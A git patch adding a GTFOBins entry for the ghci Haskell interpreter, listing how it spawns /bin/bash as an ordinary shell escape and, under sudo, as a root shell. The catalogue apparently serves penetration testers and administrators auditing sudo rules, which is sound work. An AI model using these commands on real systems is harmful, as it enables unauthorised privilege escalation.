From 373f57fc1895708b3daa0f282362f61fb94e3487 Mon Sep 17 00:00:00 2001 From: Ryan Saridar <8403417+VortixDev@users.noreply.github.com> Date: Thu, 22 Oct 2020 17:28:46 +0100 Subject: [PATCH] Add ghci binary --- _gtfobins/ghci.md | 11 +++++++++++ 1 file changed, 11 insertions(+) create mode 100644 _gtfobins/ghci.md diff --git a/_gtfobins/ghci.md b/_gtfobins/ghci.md new file mode 100644 index 0000000..330ce0e --- /dev/null +++ b/_gtfobins/ghci.md @@ -0,0 +1,11 @@ +--- +functions: + shell: + - code: | + ghci + Prelude> System.Process.callCommand "/bin/bash" + sudo: + - code: | + sudo ghci + Prelude> System.Process.callCommand "/bin/bash" +---